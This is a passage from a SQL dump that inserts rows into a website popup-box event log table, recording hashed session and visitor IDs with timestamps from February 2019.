(57436, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 08:59:56'),
(57437, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 09:06:14'),
(57438, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 09:06:14'),
(57439, 'b276bec9b674ac99ff233f5a4d0580fb', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-02-09 09:06:21'),
(57440, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 09:06:33'),
(57441, 'b276bec9b674ac99ff233f5a4d0580fb', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-02-09 09:06:50'),
(57442, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 09:07:19'),
(57443, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 09:08:00'),
(57444, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 09:08:33'),
(57445, 'b276bec9b674ac99ff233f5a4d0580fb', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-02-09 09:08:49'),
(57446, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 09:09:11'),
(57447, 'b276bec9b674ac99ff233f5a4d0580fb', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-02-09 09:09:24'),
(57448, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 09:09:26'),
(57449, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 09:10:01'),
(57450, 'f1fab0f07553b0949d861c04945ed428', '1c68b977b911188c', 0, 2, 1, '2019-02-09 09:10:42'),
(57451, '853707566d2328642460337f1a1ce1f8', '4c38a2f2118e4994', 0, 2, 1, '2019-02-09 09:10:56'),
(57452, 'f1fab0f07553b0949d861c04945ed428', '1c68b977b911188c', 0, 2, 1, '2019-02-09 09:11:09');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(57453, '853707566d2328642460337f1a1ce1f8', '4c38a2f2118e4994', 0, 2, 1, '2019-02-09 09:11:12'),
(57454, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 09:11:33'),
(57455, '853707566d2328642460337f1a1ce1f8', '4c38a2f2118e4994', 0, 2, 1, '2019-02-09 09:11:42'),
(57456, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 09:11:51'),
(57457, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 09:12:23'),
(57458, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 09:13:04'),
(57459, '64a41f22d5f67f2c9e66f6740444af8e', '575b738595cdb2f5', 0, 2, 1, '2019-02-09 09:14:02'),
(57460, '64a41f22d5f67f2c9e66f6740444af8e', '575b738595cdb2f5', 0, 2, 1, '2019-02-09 09:14:21'),
(57461, '64a41f22d5f67f2c9e66f6740444af8e', '575b738595cdb2f5', 0, 2, 1, '2019-02-09 09:14:53'),
(57462, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 09:15:32'),
(57463, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 09:17:58'),
(57464, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 09:19:17'),
(57465, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 09:19:53'),
(57466, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 09:20:43'),
(57467, 'f1fab0f07553b0949d861c04945ed428', '1c68b977b911188c', 0, 2, 1, '2019-02-09 09:21:35'),
(57468, '28c9c5fc9c7cc7c5738e1a7ed0bcad99', '8c9db562eb8705f9', 0, 2, 1, '2019-02-09 09:22:00'),
(57469, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 09:22:05'),
(57470, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 09:22:30'),
(57471, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 09:22:55'),
(57472, 'c51c696e93fd00f379be700349748ebc', 'fbc9d7ace3bb8e8f', 0, 2, 1, '2019-02-09 09:23:15'),
(57473, 'c51c696e93fd00f379be700349748ebc', 'fbc9d7ace3bb8e8f', 0, 2, 1, '2019-02-09 09:23:25'),
(57474, '1bba22eb36023ac4cd6cf5b343d0fa2d', '16dbd7825fa843c4', 0, 2, 1, '2019-02-09 09:25:36'),
(57475, '1bba22eb36023ac4cd6cf5b343d0fa2d', '16dbd7825fa843c4', 0, 2, 1, '2019-02-09 09:25:57'),
(57476, 'c51c696e93fd00f379be700349748ebc', 'fbc9d7ace3bb8e8f', 0, 2, 1, '2019-02-09 09:26:31'),
(57477, 'b276bec9b674ac99ff233f5a4d0580fb', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-02-09 09:29:00'),
(57478, '6f5501aab419393e200e62f78c72dc87', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 09:30:26'),
(57479, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 09:30:28'),
(57480, 'b276bec9b674ac99ff233f5a4d0580fb', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-02-09 09:30:28'),
(57481, '3526c3028f6c70177634491a10415e77', '2ef84fb2d317330a', 0, 2, 1, '2019-02-09 09:31:37'),
(57482, '3526c3028f6c70177634491a10415e77', '2ef84fb2d317330a', 0, 2, 1, '2019-02-09 09:32:06'),
(57483, '0cd991709733482b0011d60a766139a1', 'eb2541191419e6ed', 0, 2, 1, '2019-02-09 09:33:43'),
(57484, '335ffd539067b319edad310103d50c59', 'a639f655bef0fc87', 0, 2, 1, '2019-02-09 09:37:25'),
(57485, '1f76185ada908cae57843b4072b25fd6', 'c9364f70ae30f1be', 0, 2, 1, '2019-02-09 09:37:36'),
(57486, 'f1fab0f07553b0949d861c04945ed428', '1c68b977b911188c', 0, 2, 1, '2019-02-09 09:40:08'),
(57487, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 09:40:33'),
(57488, '3887f8361428855a86a004c25886c910', 'e8f28bd63e1e0a86', 0, 2, 1, '2019-02-09 09:40:33'),
(57489, 'f1fab0f07553b0949d861c04945ed428', '1c68b977b911188c', 0, 2, 1, '2019-02-09 09:40:42'),
(57490, '7abd72912c61cb0527738fc071ba0d17', '1c68b977b911188c', 0, 2, 1, '2019-02-09 09:41:39'),
(57491, '3887f8361428855a86a004c25886c910', 'e8f28bd63e1e0a86', 0, 2, 1, '2019-02-09 09:41:46'),
(57492, 'a90a9d64d62af690c46aff2c5b062c64', '9a903552e28cf43c', 0, 2, 1, '2019-02-09 09:42:12'),
(57493, '3887f8361428855a86a004c25886c910', 'e8f28bd63e1e0a86', 0, 2, 1, '2019-02-09 09:42:21'),
(57494, '7abd72912c61cb0527738fc071ba0d17', '1c68b977b911188c', 0, 2, 1, '2019-02-09 09:43:19'),
(57495, '280ba50f8f7af12b88d9ccad6bb8dfdc', '2ef84fb2d317330a', 0, 2, 1, '2019-02-09 09:43:44'),
(57496, 'e89ec70734117de0cea740e2398943de', '1c68b977b911188c', 0, 2, 1, '2019-02-09 09:44:37'),
(57497, 'b9e5961d1330fbe41a7acd5cb6ea4d2c', '65e1b73cf3be5c3f', 0, 2, 1, '2019-02-09 09:44:43'),
(57498, '6fdd89b64a59b4f95568f1a0d80d09e9', '4fa83dd66d754b91', 0, 2, 1, '2019-02-09 09:45:27'),
(57499, 'a90a9d64d62af690c46aff2c5b062c64', '9a903552e28cf43c', 0, 2, 1, '2019-02-09 09:46:05'),
(57500, '6fdd89b64a59b4f95568f1a0d80d09e9', '4fa83dd66d754b91', 0, 2, 1, '2019-02-09 09:46:09'),
(57501, '280ba50f8f7af12b88d9ccad6bb8dfdc', '2ef84fb2d317330a', 0, 2, 1, '2019-02-09 09:47:12'),
(57502, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 09:47:26'),
(57503, '1648a125e603d833c2dd5258f45a1817', '6f8a260dd974c75c', 0, 2, 1, '2019-02-09 09:48:26'),
(57504, '6c5e15229974bfd58aca2ad028cf5ce5', '3de88ff4581dab27', 0, 2, 1, '2019-02-09 09:48:44'),
(57505, '6c5e15229974bfd58aca2ad028cf5ce5', '3de88ff4581dab27', 0, 2, 1, '2019-02-09 09:49:13'),
(57506, '6c5e15229974bfd58aca2ad028cf5ce5', '3de88ff4581dab27', 0, 2, 1, '2019-02-09 09:50:00'),
(57507, '6fdd89b64a59b4f95568f1a0d80d09e9', '4fa83dd66d754b91', 0, 2, 1, '2019-02-09 09:50:38'),
(57508, '280ba50f8f7af12b88d9ccad6bb8dfdc', '2ef84fb2d317330a', 0, 2, 1, '2019-02-09 09:50:56'),
(57509, '280ba50f8f7af12b88d9ccad6bb8dfdc', '2ef84fb2d317330a', 0, 2, 1, '2019-02-09 09:51:13'),
(57510, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 09:52:34'),
(57511, '6fdd89b64a59b4f95568f1a0d80d09e9', '4fa83dd66d754b91', 0, 2, 1, '2019-02-09 09:56:43'),
(57512, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-09 10:01:44'),
(57513, '83b2dae7ec5c6f286ddb6440aa50dad2', '288a3fac1565dd18', 0, 2, 1, '2019-02-09 10:03:06'),
(57514, '13a492a4c9a0a74ecb8fc7e9c6176672', 'de9b8e6bc6e762ed', 0, 2, 1, '2019-02-09 10:05:17'),
(57515, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 10:07:19'),
(57516, '280ba50f8f7af12b88d9ccad6bb8dfdc', '2ef84fb2d317330a', 0, 2, 1, '2019-02-09 10:08:01'),
(57517, '280ba50f8f7af12b88d9ccad6bb8dfdc', '2ef84fb2d317330a', 0, 2, 1, '2019-02-09 10:08:18'),
(57518, '09acc2d4347586308e4005456e4c1ce3', '4a15b9805f740225', 0, 2, 1, '2019-02-09 10:12:39'),
(57519, '09acc2d4347586308e4005456e4c1ce3', '4a15b9805f740225', 0, 2, 1, '2019-02-09 10:13:10'),
(57520, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 10:13:58'),
(57521, '09acc2d4347586308e4005456e4c1ce3', '4a15b9805f740225', 0, 2, 1, '2019-02-09 10:14:41'),
(57522, '09acc2d4347586308e4005456e4c1ce3', '4a15b9805f740225', 0, 2, 1, '2019-02-09 10:15:03'),
(57523, '09acc2d4347586308e4005456e4c1ce3', '4a15b9805f740225', 0, 2, 1, '2019-02-09 10:16:01'),
(57524, '2199be634bf88196154602f415c91df6', 'b46088dd9a56e8d0', 0, 2, 1, '2019-02-09 10:16:21'),
(57525, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 10:16:27'),
(57526, '3887f8361428855a86a004c25886c910', 'e8f28bd63e1e0a86', 0, 2, 1, '2019-02-09 10:16:30'),
(57527, '6f5501aab419393e200e62f78c72dc87', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 10:16:38'),
(57528, '307014cdc9967a2dabcaca09f038899c', '4fa83dd66d754b91', 0, 2, 1, '2019-02-09 10:16:50'),
(57529, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 10:16:56'),
(57530, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-09 10:17:15'),
(57531, '09acc2d4347586308e4005456e4c1ce3', '4a15b9805f740225', 0, 2, 1, '2019-02-09 10:18:21'),
(57532, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 10:18:48'),
(57533, '1648a125e603d833c2dd5258f45a1817', '6f8a260dd974c75c', 0, 2, 1, '2019-02-09 10:18:59'),
(57534, 'e89ec70734117de0cea740e2398943de', '1c68b977b911188c', 0, 2, 1, '2019-02-09 10:19:22'),
(57535, '776b70f163ab5eb1ee1bb015aa04fe10', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-09 10:22:50'),
(57536, 'd1b8390e76ccf7f1ba17203e65a6f930', '8e018513c1c0e424', 0, 2, 1, '2019-02-09 10:25:59'),
(57537, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 10:27:58'),
(57538, '6f5501aab419393e200e62f78c72dc87', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 10:28:15'),
(57539, '280ba50f8f7af12b88d9ccad6bb8dfdc', '2ef84fb2d317330a', 0, 2, 1, '2019-02-09 10:28:25'),
(57540, '6f5501aab419393e200e62f78c72dc87', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 10:28:35'),
(57541, '280ba50f8f7af12b88d9ccad6bb8dfdc', '2ef84fb2d317330a', 0, 2, 1, '2019-02-09 10:28:35'),
(57542, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-09 10:28:46'),
(57543, '280ba50f8f7af12b88d9ccad6bb8dfdc', '2ef84fb2d317330a', 0, 2, 1, '2019-02-09 10:28:47'),
(57544, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 10:29:20'),
(57545, 'c51c696e93fd00f379be700349748ebc', 'fbc9d7ace3bb8e8f', 0, 2, 1, '2019-02-09 10:29:28'),
(57546, '6f5501aab419393e200e62f78c72dc87', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 10:29:32'),
(57547, '3887f8361428855a86a004c25886c910', 'e8f28bd63e1e0a86', 0, 2, 1, '2019-02-09 10:29:34'),
(57548, '09acc2d4347586308e4005456e4c1ce3', '4a15b9805f740225', 0, 2, 1, '2019-02-09 10:29:39'),
(57549, 'b276bec9b674ac99ff233f5a4d0580fb', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-02-09 10:29:45'),
(57550, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 10:29:51'),
(57551, '3de9d7d50ac0ecfc99c3002515512ebb', '4fa83dd66d754b91', 0, 2, 1, '2019-02-09 10:30:04'),
(57552, 'b276bec9b674ac99ff233f5a4d0580fb', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-02-09 10:30:05'),
(57553, '1bba22eb36023ac4cd6cf5b343d0fa2d', '16dbd7825fa843c4', 0, 2, 1, '2019-02-09 10:30:19'),
(57554, 'b276bec9b674ac99ff233f5a4d0580fb', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-02-09 10:30:32'),
(57555, 'e89ec70734117de0cea740e2398943de', '1c68b977b911188c', 0, 2, 1, '2019-02-09 10:30:59'),
(57556, '3de9d7d50ac0ecfc99c3002515512ebb', '4fa83dd66d754b91', 0, 2, 1, '2019-02-09 10:31:01'),
(57557, 'e89ec70734117de0cea740e2398943de', '1c68b977b911188c', 0, 2, 1, '2019-02-09 10:31:39'),
(57558, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 10:32:00'),
(57559, '175cbafd5b34390feb8db981b6b53abd', 'f5d3fffa2a64a4ec', 0, 2, 1, '2019-02-09 10:32:15'),
(57560, 'e48f496059ec85c962fdfa707449a450', '37e74ecdea34d934', 0, 2, 1, '2019-02-09 10:35:55'),
(57561, '6f5501aab419393e200e62f78c72dc87', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 10:38:47'),
(57562, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 10:38:49'),
(57563, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 10:39:05'),
(57564, 'b276bec9b674ac99ff233f5a4d0580fb', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-02-09 10:39:05'),
(57565, '6f5501aab419393e200e62f78c72dc87', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 10:39:08'),
(57566, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 10:39:25'),
(57567, 'b276bec9b674ac99ff233f5a4d0580fb', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-02-09 10:39:33'),
(57568, '6f5501aab419393e200e62f78c72dc87', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 10:39:36'),
(57569, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 10:39:46'),
(57570, '280ba50f8f7af12b88d9ccad6bb8dfdc', '2ef84fb2d317330a', 0, 2, 1, '2019-02-09 10:39:57'),
(57571, 'b276bec9b674ac99ff233f5a4d0580fb', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-02-09 10:40:00'),
(57572, '6f5501aab419393e200e62f78c72dc87', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 10:40:13'),
(57573, '0680b50dde6353f8b0ed3018edefb446', '78bc5084f0e623a6', 0, 2, 1, '2019-02-09 10:40:14'),
(57574, '175cbafd5b34390feb8db981b6b53abd', 'f5d3fffa2a64a4ec', 0, 2, 1, '2019-02-09 10:40:20'),
(57575, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 10:40:21'),
(57576, '3887f8361428855a86a004c25886c910', 'e8f28bd63e1e0a86', 0, 2, 1, '2019-02-09 10:40:21'),
(57577, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 10:40:34'),
(57578, 'b276bec9b674ac99ff233f5a4d0580fb', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-02-09 10:40:34'),
(57579, '280ba50f8f7af12b88d9ccad6bb8dfdc', '2ef84fb2d317330a', 0, 2, 1, '2019-02-09 10:40:35'),
(57580, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 10:40:38'),
(57581, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 10:40:55'),
(57582, 'b276bec9b674ac99ff233f5a4d0580fb', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-02-09 10:41:06'),
(57583, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 10:41:13'),
(57584, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 10:41:23'),
(57585, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 10:41:31'),
(57586, 'b276bec9b674ac99ff233f5a4d0580fb', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-02-09 10:41:33'),
(57587, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 10:41:44'),
(57588, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 10:41:46'),
(57589, 'b276bec9b674ac99ff233f5a4d0580fb', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-02-09 10:41:55'),
(57590, '280ba50f8f7af12b88d9ccad6bb8dfdc', '2ef84fb2d317330a', 0, 2, 1, '2019-02-09 10:42:03'),
(57591, '6f5501aab419393e200e62f78c72dc87', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 10:42:07'),
(57592, 'b276bec9b674ac99ff233f5a4d0580fb', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-02-09 10:42:22'),
(57593, 'c37de29528c7bac4c0557f5d9855bfc6', '884185eccd4de92a', 0, 2, 1, '2019-02-09 10:42:31'),
(57594, '3887f8361428855a86a004c25886c910', 'e8f28bd63e1e0a86', 0, 2, 1, '2019-02-09 10:42:44'),
(57595, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 10:43:28'),
(57596, '6f5501aab419393e200e62f78c72dc87', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 10:43:31'),
(57597, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 10:43:40'),
(57598, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 10:43:53'),
(57599, 'c37de29528c7bac4c0557f5d9855bfc6', '884185eccd4de92a', 0, 2, 1, '2019-02-09 10:44:09'),
(57600, 'c2d98627556d5bf76dde86c01316a6f7', '2ef84fb2d317330a', 0, 2, 1, '2019-02-09 10:44:38'),
(57601, '97cdda789892c047ef920fc3eb0d7ff1', '96ac38d62970cfee', 0, 2, 1, '2019-02-09 10:45:40'),
(57602, '02772bb0ddf4693cbd25250ecc4d372d', '9485c0cbaf2078d7', 0, 2, 1, '2019-02-09 10:46:02'),
(57603, '3887f8361428855a86a004c25886c910', 'e8f28bd63e1e0a86', 0, 2, 1, '2019-02-09 10:46:06'),
(57604, 'c2d98627556d5bf76dde86c01316a6f7', '2ef84fb2d317330a', 0, 2, 1, '2019-02-09 10:46:10'),
(57605, 'c2d98627556d5bf76dde86c01316a6f7', '2ef84fb2d317330a', 0, 2, 1, '2019-02-09 10:46:24'),
(57606, 'c2d98627556d5bf76dde86c01316a6f7', '2ef84fb2d317330a', 0, 2, 1, '2019-02-09 10:46:29'),
(57607, 'c2d98627556d5bf76dde86c01316a6f7', '2ef84fb2d317330a', 0, 2, 1, '2019-02-09 10:46:39'),
(57608, 'a16a4a374324a16230cce0c414d73a7c', '483313bcaa5a7274', 0, 2, 1, '2019-02-09 10:47:03'),
(57609, '3de9d7d50ac0ecfc99c3002515512ebb', '4fa83dd66d754b91', 0, 2, 1, '2019-02-09 10:47:29'),
(57610, '175cbafd5b34390feb8db981b6b53abd', 'f5d3fffa2a64a4ec', 0, 2, 1, '2019-02-09 10:47:50'),
(57611, '0ea3dbf97032ba27a1c83bf04f87b586', 'd131b6333aa3bbcb', 0, 2, 1, '2019-02-09 10:48:57'),
(57612, '0680b50dde6353f8b0ed3018edefb446', '78bc5084f0e623a6', 0, 2, 1, '2019-02-09 10:49:52'),
(57613, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 10:50:10'),
(57614, 'e48f496059ec85c962fdfa707449a450', '37e74ecdea34d934', 0, 2, 1, '2019-02-09 10:50:54'),
(57615, '335ffd539067b319edad310103d50c59', 'a639f655bef0fc87', 0, 2, 1, '2019-02-09 10:51:47'),
(57616, '00c1b1dc3b627cb7daa0ff87f5c7ab01', '86f971d8c824d84a', 0, 2, 1, '2019-02-09 10:53:51'),
(57617, '00c1b1dc3b627cb7daa0ff87f5c7ab01', '86f971d8c824d84a', 0, 2, 1, '2019-02-09 10:53:59'),
(57618, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 10:54:08'),
(57619, 'c2d98627556d5bf76dde86c01316a6f7', '2ef84fb2d317330a', 0, 2, 1, '2019-02-09 10:55:50'),
(57620, 'c2d98627556d5bf76dde86c01316a6f7', '2ef84fb2d317330a', 0, 2, 1, '2019-02-09 10:56:34'),
(57621, 'c2d98627556d5bf76dde86c01316a6f7', '2ef84fb2d317330a', 0, 2, 1, '2019-02-09 10:57:06'),
(57622, 'c2d98627556d5bf76dde86c01316a6f7', '2ef84fb2d317330a', 0, 2, 1, '2019-02-09 10:57:13'),
(57623, '49f55f13c4e9179b42cb9e0851d8582b', '4d472e73d2138afa', 0, 2, 1, '2019-02-09 10:57:29'),
(57624, '49f55f13c4e9179b42cb9e0851d8582b', '4d472e73d2138afa', 0, 2, 1, '2019-02-09 10:59:06'),
(57625, 'c2d98627556d5bf76dde86c01316a6f7', '2ef84fb2d317330a', 0, 2, 1, '2019-02-09 11:00:07'),
(57626, 'c2d98627556d5bf76dde86c01316a6f7', '2ef84fb2d317330a', 0, 2, 1, '2019-02-09 11:01:28'),
(57627, 'c51c696e93fd00f379be700349748ebc', 'fbc9d7ace3bb8e8f', 0, 2, 1, '2019-02-09 11:02:06'),
(57628, '76c4b6a5b977a0fd7d012bddaffa6b66', 'd253aa15f0650852', 0, 2, 1, '2019-02-09 11:03:03'),
(57629, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 11:03:08'),
(57630, 'cfa8167371979049b37c2cc8225b36b8', 'b814cb4fd0e16f35', 0, 2, 1, '2019-02-09 11:03:09'),
(57631, '6f5501aab419393e200e62f78c72dc87', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 11:05:36'),
(57632, '34ef462ff1e9b6d61dc2d0fecaece3d4', '3fdb63a2b57cd09e', 0, 2, 1, '2019-02-09 11:07:28'),
(57633, 'f5baac4dad2006310a7b1bfa054eafde', 'f57df3b284792c57', 0, 2, 1, '2019-02-09 11:10:47'),
(57634, '3dca049a7271ed7f831ba771d8c6dc9b', '32d0a21ed89192dd', 0, 2, 1, '2019-02-09 11:11:58'),
(57635, 'e48f496059ec85c962fdfa707449a450', '37e74ecdea34d934', 0, 2, 1, '2019-02-09 11:13:02'),
(57636, '8ad037787b8f2fcf2fcbd581221ca561', '0e4fa1b434ece787', 0, 2, 1, '2019-02-09 11:14:06'),
(57637, 'eec803c76d9eabb37a96b540fec9353f', '4fa83dd66d754b91', 0, 2, 1, '2019-02-09 11:14:06'),
(57638, '49f55f13c4e9179b42cb9e0851d8582b', '4d472e73d2138afa', 0, 2, 1, '2019-02-09 11:15:20'),
(57639, '00c1b1dc3b627cb7daa0ff87f5c7ab01', '86f971d8c824d84a', 0, 2, 1, '2019-02-09 11:16:54'),
(57640, '6a1e2819cbbda4c69748f927f50ac450', 'a6206deafd537706', 0, 2, 1, '2019-02-09 11:17:19'),
(57641, 'a09daf8e1782b1559c3c82db7f92951e', '196ae7616c94df27', 0, 2, 1, '2019-02-09 11:19:30'),
(57642, 'b19ca18bfb3bbcaed9c0904c796a8f1f', '88b9ebfa6a8ba608', 0, 2, 1, '2019-02-09 11:24:13'),
(57643, 'e48f496059ec85c962fdfa707449a450', '37e74ecdea34d934', 0, 2, 1, '2019-02-09 11:25:54'),
(57644, '776b70f163ab5eb1ee1bb015aa04fe10', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-09 11:26:16'),
(57645, '02772bb0ddf4693cbd25250ecc4d372d', '9485c0cbaf2078d7', 0, 2, 1, '2019-02-09 11:28:12'),
(57646, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 11:28:27'),
(57647, '6f5501aab419393e200e62f78c72dc87', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 11:28:42'),
(57648, '02772bb0ddf4693cbd25250ecc4d372d', '9485c0cbaf2078d7', 0, 2, 1, '2019-02-09 11:29:15'),
(57649, '6f5501aab419393e200e62f78c72dc87', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 11:29:28'),
(57650, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 11:29:43'),
(57651, '776b70f163ab5eb1ee1bb015aa04fe10', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-09 11:29:47'),
(57652, '6f5501aab419393e200e62f78c72dc87', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 11:29:49'),
(57653, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 11:29:55'),
(57654, '6f5501aab419393e200e62f78c72dc87', 'df27b9a2919a8206', 0, 2, 1, '2019-02-09 11:30:02'),
(57655, '169ba7d15e3b92c08503d4f76523381c', '12ed21842ec29d17', 0, 2, 1, '2019-02-09 11:30:04'),
(57656, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 11:30:11'),
(57657, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-09 11:30:32'),
(57658, '776b70f163ab5eb1ee1bb015aa04fe10', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-09 11:30:44'),
(57659, 'c2d98627556d5bf76dde86c01316a6f7', '2ef84fb2d317330a', 0, 2, 1, '2019-02-09 11:30:49'),
(57660, 'a09daf8e1782b1559c3c82db7f92951e', '196ae7616c94df27', 0, 2, 1, '2019-02-09 11:30:49'),
(57661, '02772bb0ddf4693cbd25250ecc4d372d', '9485c0cbaf2078d7', 0, 2, 1, '2019-02-09 11:31:12'),
(57662, 'a09daf8e1782b1559c3c82db7f92951e', '196ae7616c94df27', 0, 2, 1, '2019-02-09 11:31:24'),
(57663, '6a1e2819cbbda4c69748f927f50ac450', 'a6206deafd537706', 0, 2, 1, '2019-02-09 11:31:26'),
